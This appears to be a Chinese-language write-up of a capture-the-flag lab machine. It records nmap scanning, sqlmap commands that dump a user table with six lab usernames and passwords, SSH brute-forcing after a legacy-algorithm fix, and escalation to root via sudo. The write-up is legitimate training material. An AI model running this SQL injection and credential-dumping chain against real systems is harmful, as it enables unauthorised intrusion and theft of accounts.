一、信息收集
arp-scan -l
获得靶机ip 192.168.91.135
进行常规nmap扫描
nmap -sT --min-rate 10000 -p- 192.168.91.135
nmap -sT -sV -sC -O -p22,25,80,631 192.168.91.135
nmap --script=vuln -p22,25,80,631 192.168.91.135
扫描出来四个端口,22端口ssh服务,25端口smtp服务(用于邮件的发送),80端口http服务,631端口关闭ipp服务
打开web界面,内容是一些其他语言,没有什么收获。
通过上面的信息,我们查看到可能存在sql注入漏洞,测试一下。
二、漏洞利用-SQL注入
页面有变化,说明存在SQL注入,使用sqlmap进行注入。
sqlmap -u "http://192.168.91.135/?title=Blog&id=5%27%20OR%20sqlspider&page=blog" --dbs
//爆库
sqlmap -u "http://192.168.91.135/?title=Blog&id=5%27%20OR%20sqlspider&page=blog" -D ehks --tables
//爆表
sqlmap -u "http://192.168.91.135/?title=Blog&id=5%27%20OR%20sqlspider&page=blog" -D ehks -T user --columns
//爆列
sqlmap -u "http://192.168.91.135/?title=Blog&id=5%27%20OR%20sqlspider&page=blog" -D ehks -T user -C user_name,user_pass
//爆详细信息
user_name:
achen
dstevens
ghighland
jdurbin
pmoore
sorzek
user_pass:
seventysixers
ilike2surf
undone1
Sue1978
Homesite
pacman
三、SSH连接
将得到的用户名和密码存在kali本地文件后使用ssh爆破
爆破不太成功,查看ERROR发现是服务器端和客户端使用的算法不一致导致无法登录。
在/etc中修改ssh_config文件
将下面的代码加进去即可
KexAlgorithms diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
Ciphers chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
HostKeyAlgorithms ssh-rsa,ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256
MACs hmac-md5,hmac-sha1,umac-64@openssh.com
ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.91.135
//将Their offer后面提供的算法加入到参数中
成功登录,使用sudo -l发现可以直接提权
成功拿到root。
四、总结
1、首先进行常规nmap扫描,发现四个端口,22,25,80,631。
2、打开web界面,发现不像是英语,而是其他语言,没有可利用信息,再查看–script-vuln扫出来的信息发现可能存在sql注入漏洞,测试后发现存在sql注入漏洞。
3、使用sqlmap对数据库进行注入,查看到user表中的数据,里面有六组账号密码,尝试使用ssh登录。
4、在ssh登录过程中发现报错,查看报错信息是服务器和客户端的算法不一致导致无法登录,在ssh后面将报错内提供的算法写进参数即可正常使用ssh。
5、登录到ssh后发现可以直接提权。